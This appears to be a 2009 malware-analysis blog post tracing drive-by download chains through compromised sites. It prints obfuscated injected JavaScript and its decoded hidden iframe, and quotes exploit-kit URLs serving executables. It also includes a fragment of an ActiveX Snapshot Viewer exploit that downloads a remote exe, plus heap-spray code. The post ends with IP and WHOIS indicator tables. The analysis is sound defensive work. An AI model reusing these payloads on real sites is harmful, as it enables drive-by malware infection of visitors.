WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead to trojans beeing automatically installed on your computer. Do NOT visit them unless you know what you are doing. (only links are safe)
The story about "Hosted JavaScript leading to .cn PDF Malware" which has implicated clarafin[.]info, fabiomotor[.]cn and letomerin[.]cn continue! New sites appear as intermediaries for distributing malware.
About beebest[.]cn I will take this domain for example "cmizziconstruction.com"
The Diagnostic page for cmizziconstruction.com. (Provided by Google Safe Browsing)
In the source code we can see:
<script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d 2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534() ));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){ var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49 d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43< h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647 24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36='' ;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628 216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+ r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027 '+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366 5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+' 332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+ '342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253 7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36 +'392532652536332536662536642532662536392536652532652537'+r36+'302 536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34 2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346 42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536 6625366425323825323925326125333425333125333125333325333825323925 3262253237'+r36+'253334253338253336253338253636253336253336253237' +r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364 253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363 82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+' 342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253 7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925 3361253638253639253634253634253635253665253237'+r36+'253365253363 2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29 293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27 '+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3 64714d7(h49d2e36474be1));</script> |
The deobfuscated code is
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65% 20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7 4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f% 6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29% 2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2 0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d %31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69% 6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72 %61%6d%65%3e'));}var myia=true;</script>
|
which is an IFRAME <iframe name=c27 src='hxxp://extraspray.com/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe> |
Analysis on March 25
hxxp://extraspray.com/in.php?
| URL Analysis | hxxp://agkt.info/evo/getexe.exe ?o=7&t=1238025784&i=2154770527&e=
| | hxxp://agkt.info/evo/exploits/x19.php ?o=7&t=1238025784&i =2154770527
| | hxxp://agkt.info/evo/exploits/x18.php ?o=7&t=1238025784&i=2154770527
| | hxxp://agkt.info/evo/exploits/x21x1.php
| | hxxp://agkt.info/evo/getexe.exe ?o=4&t=1238025787&i=2154770527&e= | | hxxp://rifnasax.cn/nuc/exe.php | URL Analysis - VirusTotal (Kryptik) |
Analysis on April 17 hxxp://extraspray.com/in.php?
| URL Analysis | hxxp://sgqw.info/evo/getexe.exe ?o=7&t=1239978315&i=2154770527&e=
| | hxxp://sgqw.info/evo/exploits/x19.php ?o=7&t=1239978315&i=2154770
| | hxxp://sgqw.info/evo/exploits/x18.php ?o=7&t=1239978315&i=2154770527
| URL Analysis - VirusTotal - Anubis | hxxp://sgqw.info/evo/getexe.exe ?o=7&t=1239978315&i=2154770527&e=18
| URL Analysis - VirusTotal - Anubis |
Now with clarafin[.]info
Analysis on April 17 (07:26)
The source code show:
<script>if (!myia){ document.write(unescape(' %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33% 32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c %61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61% 66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d %61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e% 72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29 %2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20% 77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7 4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73 %69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27% 3e%3c%2f%69%66%72%61%6d%65%3e')); } var myia = true; </script>
|
which is the IFRAME for clarafin[.]info
<iframe name=c32 src='hxxp://clarafin.info/traff/index.php?'+Math.round(Math.random() *253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'> </iframe>
|
You can follow the result for "clarafin.info" on this page: Internet Storm Center: Hosted javascript leading to .cn PDF malware
-------------
And now the new one who just appear on the same page: beebest[.]cn
Google Diagnosting for beebest.cn AS41665 (HOSTING)
This is just a part of the code:
function ss() { try{ ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1"); var arbitrary _file = "hxxp://beebest.cn/dlutrl23dnwfas/exe.php"; var dest = 'C:/Program Files/Outlook Express/wab .exe'; document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'> </object> "); attack.SnapshotPath = arbitrary_file; setTimeout('window.location = "ldap://127.0.0.1"',3000); a ttack.CompressedPath = dest; attack.PrintSnapshot(arbitrary_file,dest); }catch(e){} } function xml() { var spray = unescape("%u0a0a%u0a0a"); do { spray += spray; } while(spray.length < 0xd0000); memory = new Array(); for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; } document. getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!
|
A ThreatExpertresult show the connection with stopgam.cn and stopgam2.cn after infection
ThreatExpert Result
It's recommended that you block these IPs using your hosts file or your firewall. These domain are also cited on Malware Domain List: 91.212.65.7 and all are still active.
hxxp://beebest.cn | 78.109.25.215 | hxxp://clarafin.info | 212.5.74.37 | hxxp://corpamata.cn
| 78.109.25.215 | hxxp://extraspray.com
| 72.232.116.51 | hxxp://agkt.info
| | hxxp://rifnasax.cn | 91.212.65.7 | hxxp://sgqw.info | 85.17.136.137 | hxxp://stopgam.cn | 85.17.136.137 | hxxp://stopgam2.cn | 174.129.244.106 174.129.241.185 |
78.109.25.217
IP Location - Namibia - Plathost2 - Ivan Kirst
Domain Name: beebest.cn - stopgam.cn - corpamata.cn Domain Status: ok Registrant Organization: DomainsC Registrant Name: MichellGregory Administrative Email: abuse@domainsreg.cn Sponsoring Registrar: 厦门华融盛世网络有限公司 - Xiamen Huarong Spirit Network Limited Name Server: ns1.us.editdns.net Name Server: ns2.us.editdns.net Name Server: ns3.us.editdns.net Registration Date: 2009-02-11 Expiration Date: 2010-02-11
212.5.74.37
IP Location - Russia
Domain Name: clarafin.info Domain Status: ok Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd Name Server: ns1.us.editdns.net Name Server: ns2.us.editdns.net Name Server: ns3.us.editdns.net Registration Date: 2009-03-18 Expiration Date: 2010-03-18
85.17.136.137
IP Location - Netherlands - LeaseWeb
omain Name: sgqw.info Domain Status: ok Registrant Organization: Private person Registrant Name: Sumir Mahadjan Administrative Email: mahadjans9@gmail.com Sponsoring Registrar: Regtime Ltd. (R455-LRMS) Name Server: ns1.mtpv.info Name Server: ns2.mtpv.info Name Server:ns3.us.editdns.net Registration Date: 2009-04-01 Expiration Date: 2010-01-01
72.232.116.51
IP Location - US - Layered Technologies, Inc.
omain Name: extraspray.com Domain Status: ok Registrant Organization: Private person Registrant Name: Sumir Mahadjan Administrative Email: mahadjans9@gmail.com Sponsoring Registrar: Regtime Ltd. Name Server: vc11.amhost.net Name Server: vc12.amhost.net Registration Date: 2009-03-09 Expiration Date: 2010-03-09
174.129.244.106 174.129.241.185
IP Location - US - Amazon.com, Inc.
Domain Name: stopgam2.cn ROID: 20090417s10001s12986159-cn Domain Status: clientTransferProhibited Registrant Name: Zitoclick Administrative Email: support@zitoclick.com Sponsoring Registrar: InamePro dba Dynadot Name Server: ns1.dsredirection.com Name Server: ns2.dsredirection.com Registration Date: 2009-04-17 05:23 Expiration Date: 2010-04-17 05:23
91.212.41.119
Domain Name: tixwagoq.cn Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou Registrant Name: 周明 - Zhou Administrative Email: suhalbuia@163.com Sponsoring Registrar: 易名中国 - Easy Chinese Name Server: ns1.runsdns.cn Name Server: ns2.runsdns.cn Registration Date: 2009-03-18 22:16 Expiration Date: 2010-03-18 22:16
inetnum: 91.212.41.0 - 91.212.41.255 netname: gaztranzitstroyinfo-net descr: LLC "Gaztransitstroyinfo" country: Russia ------------
91.212.65.7
IP Location - Ukraine - Eurohost LLC
Domain Name: rifnasax.cn Registrant Organization: Yong also Import and Export Corporation Registrant Name: 张龙 - Long Administrative Email: alvin_555@yeah.net Sponsoring Registrar: 易名中国 - Easy Chinese Name Server: ns2.dnsmytruedns.com Name Server: ns1.dnsmytruedns.com Registration Date: 2009-02-13 19:29 Expiration Date: 2010-02-13 19:29
This IP appear to host several websites with live exploits.
91.212.65.7
hxxp://dnsmytruedns.com hxxp://hayboxiw.cn (Analysis) hxxp://paksusic.cn hxxp://paylayos.cn hxxp://peskufex.cn hxxp://porgacig.cn hxxp://qicdator.cn (Analysis) hxxp://ralcofic.cn hxxp://rifnasax.cn (Analysis) hxxp://tozxiqud.cn |
91.212.41.119
|